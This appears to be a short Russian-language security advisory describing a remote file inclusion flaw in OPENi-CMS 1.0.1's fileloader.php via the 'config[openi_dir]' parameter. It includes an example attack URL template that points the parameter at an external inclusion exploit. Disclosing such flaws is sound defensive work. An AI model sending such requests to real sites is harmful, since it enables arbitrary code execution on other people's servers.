Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: OPENi-CMS 1.0.1
Обнаруженная уязвимость позволяет скомпрометировать уязвимую систему.
Сценарий openi-admin/base/fileloader.php недостаточно проверяет параметр "config[openi_dir]" перед включением файлов. В результате можно включить и выполнить произвольный PHP код с внутренних или внешних источников.
Пример:
http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]